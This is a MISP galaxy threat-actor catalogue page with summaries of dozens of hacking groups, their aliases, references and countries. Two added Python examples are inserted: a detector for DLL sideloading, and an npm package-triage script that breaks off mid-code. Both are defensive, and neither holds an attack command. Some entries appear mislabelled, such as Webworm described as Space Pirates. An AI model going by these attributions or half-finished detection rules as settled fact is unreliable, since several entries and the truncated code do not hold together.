in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Zarya
Zarya is a pro-Russian hacktivist group that emerged in March 2022. Initially operating as a special forces unit under the command of Killnet, Zarya has since become an independent entity. The group is primarily known for engaging in Denial-of-Service attacks, website defacement campaigns, and data leaks. Zarya targets government agencies, service providers, critical infrastructure, and civil service employees, both domestically and internationally.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zarya.
Known Synonyms |
---|
UAC-0109 |
Internal MISP references
UUID 3689f0e2-6c39-4864-ae0b-cc03e4cb695a
which can be used as unique global reference for Zarya
in MISP communities and other software using the MISP galaxy
External references
- https://www.mandiant.com/resources/blog/killnet-new-capabilities-older-tactics - webarchive
- https://www.cyfirma.com/?post_type=out-of-band&p=17397 - webarchive
- https://www.reversinglabs.com/blog/the-week-in-security-possible-colonial-pipeline-2.0-ransomware-hurts-small-american-eateries - webarchive
- https://channellife.com.au/story/the-increasing-presence-of-pro-russia-hacktivists - webarchive
- https://socradar.io/dark-web-profile-killnet-russian-hacktivist-group/ - webarchive
- https://cip.gov.ua/services/cm/api/attachment/download?id=60068 - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
DarkCasino
DarkCasino is an economically motivated APT group that targets online trading platforms, including cryptocurrencies, online casinos, network banks, and online credit platforms. They are skilled at stealing passwords to access victims' online accounts and have been active for over a year. DarkCasino exploits vulnerabilities, such as the WinRAR vulnerability CVE-2023-38831, to launch phishing attacks and steal online property.
Internal MISP references
UUID b9128c29-8941-48a8-a5be-8076dde03a08
which can be used as unique global reference for DarkCasino
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Prolific Puma
Prolific Puma provides an underground link shortening service to criminals. Infoblox states that during analysis, no legitimate content was observed being served through their shortener. For their operation they use a registered domain generation algorithm (RDGA), with which they registered between 35,000 and 75,000 domain names.
Internal MISP references
UUID c8782e46-447c-4c6e-90c0-82f3bf49d64b
which can be used as unique global reference for Prolific Puma
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Bohrium
Bohrium is an Iranian threat actor that has been involved in spear-phishing operations targeting organizations in the US, Middle East, and India. They often create fake social media profiles, particularly posing as recruiters, to trick victims into running malware on their computers. Microsoft's Digital Crimes Unit has taken legal action and seized 41 domains used by Bohrium to disrupt their activities. The group has shown a particular interest in sectors such as technology, transportation, government, and education.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bohrium.
Known Synonyms |
---|
BOHRIUM |
Smoke Sandstorm |
Internal MISP references
UUID 111efc97-6a93-487b-8cb3-1e890ac51066
which can be used as unique global reference for Bohrium
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
KAX17
KAX17 is a sophisticated threat actor that has been active since at least 2017. They have operated hundreds of malicious servers within the Tor network, primarily as entry and middle points. Their main objective appears to be collecting information on Tor users and mapping their routes within the network. Despite efforts to remove their servers, KAX17 has shown resilience and continues to operate.
Internal MISP references
UUID 615311f0-58d4-4d1d-ac86-6ba86d119317
which can be used as unique global reference for KAX17
in MISP communities and other software using the MISP galaxy
External references
- https://www.malwarebytes.com/blog/news/2021/12/was-threat-actor-kax17-de-anonymizing-the-tor-network/amp - webarchive
- https://therecord.media/a-mysterious-threat-actor-is-running-hundreds-of-malicious-tor-relays - webarchive
- https://darknetlive.com/post/who-is-responsible-for-running-hundreds-of-malicious-tor-relays/ - webarchive
- https://nusenu.medium.com/is-kax17-performing-de-anonymization-attacks-against-tor-users-42e566defce8 - webarchive
Associated metadata
Metadata key | Value |
---|---|
MirrorFace
MirrorFace is a Chinese-speaking advanced persistent threat group that has been targeting high-value organizations in Japan, including media, government, diplomatic, and political entities. They have been conducting spear-phishing campaigns, utilizing malware such as LODEINFO and MirrorStealer to steal credentials and exfiltrate sensitive data. While there is speculation about their connection to APT10, ESET currently tracks them as a separate entity.
Internal MISP references
UUID e992d874-604b-4a09-9c6c-0319d5be652a
which can be used as unique global reference for MirrorFace
in MISP communities and other software using the MISP galaxy
External references
- https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/ - webarchive
- https://web-assets.esetstatic.com/wls/2023/01/eset_apt_activity_report_t32022.pdf - webarchive
- https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
VulzSecTeam
VulzSec, also known as VulzSecTeam, is a hacktivist group that has been involved in various cyber-attacks. They have targeted government websites in retaliation for issues such as police brutality and the treatment of Indian Muslims. The group has been involved in campaigns like OpIndia2.0, where they planned to launch DDoS attacks on Indian government websites.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular VulzSecTeam.
Known Synonyms |
---|
VulzSec |
Internal MISP references
UUID fcb18ca2-ea45-4f5c-a827-ed8b6b697a08
which can be used as unique global reference for VulzSecTeam
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | ID |
Chernovite
Chernovite is a highly capable and sophisticated threat actor group that has developed a modular ICS malware framework called PIPEDREAM. They are known for targeting industrial control systems and operational technology environments, with the ability to disrupt, degrade, and potentially destroy physical processes. Chernovite has demonstrated a deep understanding of ICS protocols and intrusion techniques, making them a significant threat to critical infrastructure sectors.
Internal MISP references
UUID 2ce00149-9a25-4dea-8dd5-59bdb68d11a1
which can be used as unique global reference for Chernovite
in MISP communities and other software using the MISP galaxy
External references
- https://www.dragos.com/blog/pipedream-mousehole-opcua-module/ - webarchive
- https://www.dragos.com/blog/industry-news/chernovite-pipedream-malware-targeting-industrial-control-systems/ - webarchive
- https://www.dragos.com/threats/the-2022-ics-ot-vulnerability-briefing-recap/ - webarchive
- https://www.dragos.com/blog/responding-to-chernovites-pipedream-with-dragos-global-services/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
MurenShark
MurenShark is an advanced persistent threat group that operates primarily in the Middle East, with a focus on targeting Turkey. They have shown interest in military projects, as well as research institutes and universities. This group is highly skilled in counter-analysis and reverse traceability, using sophisticated tactics to avoid detection. They utilize compromised websites as file servers and command and control servers, and have been known to use attack tools like NiceRender for phishing purposes.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MurenShark.
Known Synonyms |
---|
Actor210426 |
Internal MISP references
UUID e5c78742-bf60-4da8-b038-d548ae3f4ecb
which can be used as unique global reference for MurenShark
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
DriftingCloud
DriftingCloud is a persistent threat actor known for targeting various industries and locations. They are skilled at developing or acquiring zero-day exploits to gain unauthorized access to target networks. Compromising gateway devices is a common tactic used by DriftingCloud, making network monitoring solutions crucial for detecting their attacks.
Internal MISP references
UUID 6f6b187b-971b-4df9-a7ef-9b3fd7e092f7
which can be used as unique global reference for DriftingCloud
in MISP communities and other software using the MISP galaxy
External references
- https://socradar.io/driftingcloud-apt-group-exploits-zero-day-in-sophos-firewall/ - webarchive
- https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/ - webarchive
- https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
UNC4191
UNC4191 is a China-linked threat actor that has been involved in cyber espionage campaigns targeting public and private sectors primarily in Southeast Asia. They have been known to use USB devices as an initial infection vector and have been observed deploying various malware families on infected systems. UNC4191's operations have also extended to the US, Europe, and the Asia Pacific Japan region, with a particular focus on the Philippines.
Internal MISP references
UUID df697450-57e0-496b-982c-a167ed41f023
which can be used as unique global reference for UNC4191
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
DragonSpark
DragonSpark is a threat actor that has been conducting attacks primarily targeting organizations in East Asia. They utilize the open-source tool SparkRAT, which is a multi-platform and frequently updated remote access Trojan. The threat actor is believed to be Chinese-speaking based on their use of Chinese language support and compromised infrastructure located in China and Taiwan. They employ various techniques to evade detection, including Golang source code interpretation and the use of the China Chopper webshell.
Internal MISP references
UUID a219a78b-7b91-41b1-bf14-91e31e0bb9da
which can be used as unique global reference for DragonSpark
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
FusionCore
The CYFIRMA research team has identified a new up-and-coming European threat actor group known as FusionCore. Running Malware-as-a-Service alongside a hacker-for-hire operation, they offer a wide variety of tools and services on their website, making it a one-stop shop for threat actors looking to purchase cost-effective yet customizable malware. The operators have started a ransomware affiliate program that equips attackers with the ransomware and affiliate software to manage victims. FusionCore typically provides a detailed set of instructions for any service or product being sold, enabling individuals with minimal experience to carry out complex attacks.
Internal MISP references
UUID ab376039-4ede-4dfc-a45b-c80d9d994657
which can be used as unique global reference for FusionCore
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Earth Kitsune
Earth Kitsune is an advanced persistent threat actor that has been active since at least 2019. They primarily target individuals interested in North Korea and use various tactics, such as compromising websites and employing social engineering, to distribute self-developed backdoors. Earth Kitsune demonstrates technical proficiency and continuously evolves their tools, tactics, and procedures. They have been associated with malware such as WhiskerSpy and SLUB.
Internal MISP references
UUID a9f29636-26e4-42f0-95d1-7a49dd6f0a79
which can be used as unique global reference for Earth Kitsune
in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/en_us/research/23/b/earth-kitsune-delivers-new-whiskerspy-backdoor.html - webarchive
- https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html - webarchive
- https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-earth-kitsune-tracking-slub-s-current-operations/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
AppMilad
AppMilad is an Iranian hacking group that has been identified as the source of a spyware campaign called RatMilad. This spyware is designed to silently infiltrate victims' devices and gather personal and corporate information, including private communications and photos. The group has been distributing the spyware through fake apps and targeting primarily Middle Eastern enterprises.
Internal MISP references
UUID e284c356-4b77-4f86-a8f2-7793cbe8662b
which can be used as unique global reference for AppMilad
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
UNC4841
UNC4841 is a well-resourced threat actor that has utilized a wide range of malware and purpose-built tooling to enable their global espionage operations. They have been observed selectively deploying specific malware families at high priority targets, with SKIPJACK being the most widely deployed. UNC4841 primarily targeted government and technology organizations, but they have also been observed targeting other verticals.
Internal MISP references
UUID 8959fbb4-95f0-485d-bba2-db9140b95386
which can be used as unique global reference for UNC4841
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
CL-STA-0043
CL-STA-0043 is a highly skilled and sophisticated threat actor, believed to be a nation-state, targeting governmental entities in the Middle East and Africa. They exploit vulnerabilities in on-premises Internet Information Services and Microsoft Exchange servers to infiltrate target networks. They engage in reconnaissance, locate vital assets, and have been observed using native Windows tools for privilege escalation.
Internal MISP references
UUID 5d0aee14-f18a-44da-a44d-28d950f06b9c
which can be used as unique global reference for CL-STA-0043
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
DEV-0928
DEV-0928 is a threat actor that has been tracked by Microsoft since September 2022. They are known for their involvement in high-volume phishing campaigns, using tools offered by DEV-1101. DEV-0928 sends phishing emails to targets and has been observed launching campaigns involving millions of emails. They also utilize evasion techniques, such as redirection to benign pages, to avoid detection.
Internal MISP references
UUID 8345dd24-7884-48e3-b231-4791d31afe3d
which can be used as unique global reference for DEV-0928
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TEMP_Heretic
TEMP_Heretic is a threat actor that has been observed engaging in targeted spear-phishing campaigns. They exploit vulnerabilities in email platforms, such as Zimbra, to exfiltrate emails from government, military, and media organizations. They use multiple outlook.com email addresses and manually craft content for each email before sending it.
Internal MISP references
UUID 8dfac62e-395e-4e47-b6b6-8ab817ac25c1
which can be used as unique global reference for TEMP_Heretic
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
WeedSec
WeedSec is a threat actor group that recently targeted the online learning and course management platform Moodle, which is widely used by educational institutions and workplaces. They posted sample Moodle databases on their Telegram channel.
Internal MISP references
UUID 000a2535-8fbf-459d-a067-d10528496a92
which can be used as unique global reference for WeedSec
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA444
TA444 is a North Korea state-sponsored threat actor that primarily focuses on financially motivated operations. They have been active since at least 2017 and have recently shifted their attention to targeting cryptocurrencies. TA444 employs various infection methods and has a diverse range of malware and backdoors at their disposal. They have been attributed to stealing hundreds of millions of dollars' worth of cryptocurrency and related assets.
Internal MISP references
UUID 5a38db83-16b3-477f-a045-66a922868eea
which can be used as unique global reference for TA444
in MISP communities and other software using the MISP galaxy
External references
- https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds - webarchive
- https://cyberscoop.com/north-korean-cryptocurrency-hackers-education-government/ - webarchive
- https://www.darkreading.com/remote-workforce/north-korea-apt-swindled-1b-crypto-investors-2022 - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | KP |
UAC-0006
UAC-0006 is a financially motivated threat actor that has been active since at least 2013. They primarily target Ukrainian organizations, particularly accountants, with phishing emails containing the SmokeLoader malware. Their goal is to steal credentials and execute unauthorized fund transfers, posing a significant risk to financial systems.
Internal MISP references
UUID 013f56ea-a441-483f-812c-c384c790e474
which can be used as unique global reference for UAC-0006
in MISP communities and other software using the MISP galaxy
External references
- https://socprime.com/blog/smokeloader-detection-uac-0006-group-launches-a-new-phishing-campaign-against-ukraine/ - webarchive
- https://socprime.com/blog/smokeloader-malware-detection-uac-0006-hackers-launch-a-wave-of-phishing-attacks-against-ukraine-targeting-accountants/ - webarchive
- https://socprime.com/blog/detecting-smokeloader-campaign-uac-0006-keep-targeting-ukrainian-financial-institutions-in-a-series-of-phishing-attacks/ - webarchive
- https://socprime.com/blog/latest-threats/detect-smokeloader-malware-uac-0006-strikes-again-to-target-ukraine-in-a-series-of-phishing-attacks/ - webarchive
- https://socprime.com/blog/smokeloader-malware-detection-uac-0006-group-reemerges-to-launch-phishing-attacks-against-ukraine-using-financial-subject-lures/ - webarchive
- https://cert.gov.ua/article/4555802 - webarchive
- https://cert.gov.ua/article/6123309 - webarchive
Associated metadata
Metadata key | Value |
---|---|
NewsPenguin
NewsPenguin is a threat actor that has been targeting organizations in Pakistan. They use a complex payload delivery mechanism and exploit the upcoming Pakistan International Maritime Expo & Conference as a lure to trick their victims. The group has been linked to a phishing campaign that leverages spear-phishing emails and weaponized documents to deliver an advanced espionage tool.
Internal MISP references
UUID 4c4a8cb7-b4c4-4637-8e41-dfe19a6b40c7
which can be used as unique global reference for NewsPenguin
in MISP communities and other software using the MISP galaxy
External references
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-newspenguin-threat-actors-targeting-pakistani-entities-with-malicious-campaign-active-iocs - webarchive
- https://blogs.blackberry.com/en/2023/02/newspenguin-a-previously-unknown-threat-actor-targets-pakistan-with-advanced-espionage-tool - webarchive
Associated metadata
Metadata key | Value |
---|---|
DefrayX
DefrayX is a threat actor group known for their RansomExx ransomware operations. They primarily target Linux operating systems, but also release versions for Windows. The group has been active since 2018 and has targeted various sectors, including healthcare and manufacturing. They have also developed other malware strains such as PyXie RAT, Vatet loader, and Defray ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DefrayX.
Known Synonyms |
---|
Hive0091 |
Internal MISP references
UUID 9c102b55-29ea-4d90-9b36-33ba42f65d79
which can be used as unique global reference for DefrayX
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
PerSwaysion
PerSwaysion is a threat actor known for conducting phishing campaigns targeting high-level executives. They have been active since at least August 2019 and are believed to be based in Vietnam. PerSwaysion has recently updated their techniques, using more direct phishing methods and leveraging Microsoft 365 to steal credentials.
Internal MISP references
UUID a413c605-0e0a-41ca-bae2-5623908fda3a
which can be used as unique global reference for PerSwaysion
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | VN |
Webworm
Space Pirates is a cybercrime group that has been active since at least 2017. They primarily target Russian companies and have been observed using various malware, including Deed RAT and ShadowPad. The group uses a combination of publicly available tools and their own protocols to communicate with their command-and-control servers.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Webworm.
Known Synonyms |
---|
Space Pirates |
Internal MISP references
UUID ee306b4d-1b2b-4872-a8f1-d07e7fbab2f0
which can be used as unique global reference for Webworm
in MISP communities and other software using the MISP galaxy
External references
- http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-a-look-into-the-group-s-unconventional-techniques-new-attack-vectors-and-tools/ - webarchive
- https://blog.polyswarm.io/space-pirates-target-russian-aerospace - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
N4ughtysecTU
In March 2022, a hacking group calling themselves N4ughtySecTU claimed to have breached TransUnion’s systems and threatened to leak four terabytes of data if the credit bureau didn’t pay a $15-million (R242-million) ransom.
Internal MISP references
UUID 43236d8e-27ee-40f1-ad15-a2ad23738a76
which can be used as unique global reference for N4ughtysecTU
in MISP communities and other software using the MISP galaxy
External references
- https://mybroadband.co.za/news/security/438982-how-bank-customers-can-protect-themselves-after-hackers-leak-transunion-data.html - webarchive
- https://cisoseries.com/cyber-security-headlines-march-21-2022/ - webarchive
- https://mybroadband.co.za/news/security/443090-cybercriminals-love-south-africa-study.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | BR |
Moshen Dragon
Moshen Dragon is a Chinese-aligned cyberespionage threat actor operating in Central Asia. They have been observed deploying multiple malware triads and utilizing DLL search order hijacking to sideload ShadowPad and PlugX variants. The threat actor also employs various tools, including an LSA notification package and a passive backdoor known as GUNTERS. Their activities involve targeting the telecommunication sector and leveraging Impacket for lateral movement and data exfiltration.
Internal MISP references
UUID 41243ff2-e4f1-4605-9259-ab494c1c8c04
which can be used as unique global reference for Moshen Dragon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
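The Moshen Dragon entry above names DLL search-order hijacking as the way ShadowPad and PlugX variants get loaded by a legitimate signed executable. The following is an added example, not the group's tooling nor a vendor rule, of how that shape can be picked out of image-load telemetry. The records are constructed and mirror the fields of a Sysmon Event ID 7 (ImageLoad) event (Image is the process, ImageLoaded the DLL, Signed/SignatureStatus describe the DLL); the trusted-root and shadowed-DLL lists are assumptions for illustration.

```python
"""Flag candidate DLL search-order hijacks (sideloading) in image-load telemetry.

Added example for the technique described in the Moshen Dragon entry; it is not
the group's tooling nor a vendor rule. The records are constructed and mirror
the fields of a Sysmon Event ID 7 (ImageLoad) event.
"""
import ntpath
from typing import Dict, List

# Directories where a DLL sitting beside its EXE is normal for installed software.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# System DLL names frequently planted beside a signed EXE so the loader resolves
# them before System32 (illustrative list, an assumption of this example).
SHADOWED_SYSTEM_DLLS = {
    "version.dll", "dbghelp.dll", "wtsapi32.dll", "cryptbase.dll",
    "userenv.dll", "dwmapi.dll", "profapi.dll",
}


def _directory(path: str) -> str:
    """Lower-cased directory of a Windows path, with a trailing backslash."""
    return ntpath.dirname(path).lower().rstrip("\\") + "\\"


def sideload_reasons(ev: Dict[str, str]) -> List[str]:
    """Return the indicators present in one image-load record (empty if none)."""
    exe_dir = _directory(ev["Image"])
    dll_dir = _directory(ev["ImageLoaded"])
    dll_name = ntpath.basename(ev["ImageLoaded"]).lower()
    reasons = []
    if dll_dir == exe_dir and not exe_dir.startswith(TRUSTED_ROOTS):
        reasons.append(f"DLL loaded from the process directory outside trusted roots: {exe_dir}")
    if ev.get("Signed", "false").lower() != "true" or ev.get("SignatureStatus") != "Valid":
        reasons.append("DLL is unsigned or its signature is not valid")
    if dll_name in SHADOWED_SYSTEM_DLLS:
        reasons.append(f"{dll_name} shadows a System32 DLL of the same name")
    return reasons


def find_sideloads(events: List[Dict[str, str]]) -> List[str]:
    """ImageLoaded paths where all three indicators line up: the classic sideload shape."""
    return [ev["ImageLoaded"] for ev in events if len(sideload_reasons(ev)) == 3]


# Constructed sample telemetry (not real logs); paths and file names are hypothetical.
SAMPLE_EVENTS = [
    {   # signed tool dropped in a user-writable folder next to a planted version.dll
        "Image": r"C:\Users\Public\Libraries\svc\SecTool.exe",
        "ImageLoaded": r"C:\Users\Public\Libraries\svc\version.dll",
        "Signed": "false", "SignatureStatus": "Unavailable",
    },
    {   # the same tool resolving version.dll from System32: the normal case
        "Image": r"C:\Program Files\Vendor\SecTool.exe",
        "ImageLoaded": r"C:\Windows\System32\version.dll",
        "Signed": "true", "SignatureStatus": "Valid",
    },
    {   # unsigned plugin beside a tool in a user folder, but not a System32 name: not flagged
        "Image": r"C:\Users\alice\tools\app.exe",
        "ImageLoaded": r"C:\Users\alice\tools\plugin.dll",
        "Signed": "false", "SignatureStatus": "Unavailable",
    },
]

if __name__ == "__main__":
    for path in find_sideloads(SAMPLE_EVENTS):
        print("sideload candidate:", path)
```

Requiring all three indicators keeps the rule quiet on developer machines full of unsigned plugins; dropping the name check widens it to any unsigned DLL loaded from a user-writable process directory, which is worth a lower-severity alert on servers where that should never happen.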
TiltedTemple
One of TiltedTemple's notable tools is a custom backdoor called SockDetour, which operates filelessly and socketlessly on compromised Windows servers. The group's activities have been linked to the exploitation of vulnerabilities in Zoho ManageEngine ADSelfService Plus and ServiceDesk Plus.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TiltedTemple.
Known Synonyms |
---|
Circle Typhoon |
DEV-0322 |
Internal MISP references
UUID aca6b3d2-1c3b-4674-9de8-975e35723bcf
which can be used as unique global reference for TiltedTemple
in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/sockdetour/ - webarchive
- https://blog.fox-it.com/2021/11/08/ta505-exploits-solarwinds-serv-u-vulnerability-cve-2021-35211-for-initial-access/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
OldGremlin
OldGremlin is a Russian-speaking ransomware group that has been active for several years. They primarily target organizations in Russia, including banks, logistics, industrial, insurance, retail, and IT companies. OldGremlin is known for using phishing emails as an initial infection vector and has developed custom malware for both Windows and Linux systems. They have conducted multiple malicious email campaigns and demand large ransoms from their victims, with some reaching millions of dollars.
Internal MISP references
UUID ad8b73df-c526-4a32-b52f-c7c3c4c058d2
which can be used as unique global reference for OldGremlin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Storm Cloud
Storm Cloud is a Chinese espionage threat actor known for targeting organizations across Asia, particularly Tibetan organizations and individuals. They use a variety of malware families, including GIMMICK and GOSLU, which are feature-rich and multi-platform. Storm Cloud leverages public cloud hosting services like Google Drive for command-and-control channels, making it difficult to detect their activities.
Internal MISP references
UUID 3baec27f-3827-4a38-82c8-7195a18193f9
which can be used as unique global reference for Storm Cloud
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
CostaRicto
CostaRicto is a cyber-espionage threat actor that operates as a mercenary group, offering its services to various clients globally. They use bespoke malware tools and sophisticated techniques like VPN proxy and SSH tunnelling. While their targets are scattered across different regions, there is a concentration in South Asia.
Internal MISP references
UUID 5587f082-349b-46ab-9e6f-303d9bfd1e1b
which can be used as unique global reference for CostaRicto
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA402
TA402 is an APT group that has been tracked by Proofpoint since 2020. They primarily target government entities in the Middle East and North Africa, with a focus on intelligence collection. TA402 is known for using sophisticated phishing campaigns and constantly updating their malware implants and delivery methods to evade detection. They have been observed using cloud services like Dropbox and Google Drive for hosting malicious payloads and command-and-control infrastructure.
Internal MISP references
UUID aad291eb-08d1-4af4-9dd1-e90fe1f2d6c6
which can be used as unique global reference for TA402
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | PS |
SilverFish
SilverFish is believed to be a Russian cyberespionage group that has been involved in various cyberattacks, including the use of the SolarWinds breach as an attack vector. SilverFish has been linked to the WastedLocker ransomware and has displayed a high level of skill and organization in their cyber operations. There are also connections between SilverFish and the threat actor Evil Corp, suggesting a possible evolution or collaboration between the two groups.
Internal MISP references
UUID 55bcc595-2442-4f98-9477-7fe9b507607c
which can be used as unique global reference for SilverFish
in MISP communities and other software using the MISP galaxy
External references
- https://www.truesec.com/hub/blog/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies - webarchive
- https://www.prodaft.com/resource/detail/silverfish-global-cyber-espionage-campaign-case-report - webarchive
- https://www.mandiant.com/resources/blog/unc2165-shifts-to-evade-sanctions - webarchive
Associated metadata
Metadata key | Value |
---|---|
Blacktail
Blacktail is a cybercrime group that has gained attention for its ransomware campaigns, particularly the Buhti ransomware. They are known for using custom-built data exfiltration tools and have been observed exploiting vulnerabilities in both Windows and Linux systems.
Internal MISP references
UUID e06e1bcd-7da2-4732-934a-9fa1efa427ad
which can be used as unique global reference for Blacktail
in MISP communities and other software using the MISP galaxy
External references
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/buhti-ransomware - webarchive
- https://fortiguard.fortinet.com/threat-signal-report/5170 - webarchive
- https://www.redpacketsecurity.com/new-buhti-ransomware-gang-uses-leaked-windows-linux-encryptors/ - webarchive
- https://www.redpacketsecurity.com/buhti-ransomware-gang-switches-tactics-utilizes-leaked-lockbit-and-babuk-code/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
MalKamak
MalKamak is an Iranian threat actor that has been operating since at least 2018. They have been involved in highly targeted cyber espionage campaigns against global aerospace and telecommunications companies. MalKamak utilizes a sophisticated remote access Trojan called ShellClient, which evades antivirus tools and uses cloud services like Dropbox for command and control.
Internal MISP references
UUID 4915bfa3-5f0a-48ec-8ed5-bcd878cba504
which can be used as unique global reference for MalKamak
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
DragonForce
DragonForce is a hacktivist group based in Malaysia that has been involved in cyberattacks targeting government institutions and commercial organizations in India. They have also targeted websites affiliated with Israel and have shown support for pro-Palestinian causes. The group has been observed using defacement attacks, distributed denial-of-service attacks, and data leaks as part of their campaigns. DragonForce Malaysia has demonstrated an ability to adapt and evolve their tactics over time.
Internal MISP references
UUID 40375ed2-04ec-433f-969d-b9a004c0272e
which can be used as unique global reference for DragonForce
in MISP communities and other software using the MISP galaxy
External references
- https://www.darkowl.com/blog-content/hacktivist-groups-use-defacements-in-the-israel-hamas-conflict/ - webarchive
- https://blog.radware.com/security/2023/05/india-one-of-the-most-targeted-countries-for-hacktivist-groups/ - webarchive
- https://securitybrief.asia/story/dragonforce-malaysia-attacks-israeli-institutions-radware - webarchive
- https://www.radware.com/security/threat-advisories-and-attack-reports/opisrael-a-decade-in-review/ - webarchive
- https://blog.radware.com/security/ddos/2022/08/this-was-h1-2022-part-3-beyond-the-war/ - webarchive
- https://www.fortinet.com/blog/threat-research/guidance-on-hacktivist-operation-opspatuk-by-dragonforce - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | MY |
LightBasin
UNC1945 is an APT group that has been targeting telecommunications companies globally. They use Linux-based implants to maintain long-term access in compromised networks. UNC1945 has demonstrated advanced technical abilities, utilizing various tools and techniques to evade detection and move laterally through networks. They have also been observed targeting other industries, such as financial and professional consulting, and have been linked to other threat actors, including Mustang Panda and RedDelta.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LightBasin.
Known Synonyms |
---|
CL-CRI-0025 |
UNC1945 |
Internal MISP references
UUID a1955738-563c-413c-8602-ea5b8c89ce21
which can be used as unique global reference for LightBasin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Red-Lili
RED-LILI is an active threat actor that has been identified by the Checkmarx SCS research team. They have been publishing malicious packages on the npm and PyPI registries, and have recently automated the process of creating npm users for package publication. The Checkmarx team has detected around 1,500 malicious packages associated with RED-LILI and has continuously disclosed their findings to the respective security teams.
Internal MISP references
UUID 99d188cf-31e5-440d-a114-297cb2242d73
which can be used as unique global reference for Red-Lili
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
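The Red-Lili entry above describes bulk publication of malicious packages from freshly automated registry accounts. As an added example (not Checkmarx's detection logic), the script below shows two checks a registry consumer can run on package metadata: per package, an install-time hook that fetches or executes something combined with a very recent creation date; across packages, one maintainer pushing many fresh packages in a short window. The documents are constructed to follow the shape of an npm packument (dist-tags, versions[v].scripts, time.created, maintainers); package names, user names and URLs are hypothetical. Package creation time is used as a proxy for account age, which the packument does not carry.

```python
"""Triage npm registry metadata for the bulk-publishing pattern in the Red-Lili entry.

Added example, not Checkmarx's detection. Each document below is constructed and
follows the shape of a registry packument; names, users and URLs are hypothetical.
"""
import re
from collections import defaultdict
from datetime import datetime, timezone
from typing import Dict, List

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Commands that go beyond building: downloaders, shells, inline node code, raw URLs.
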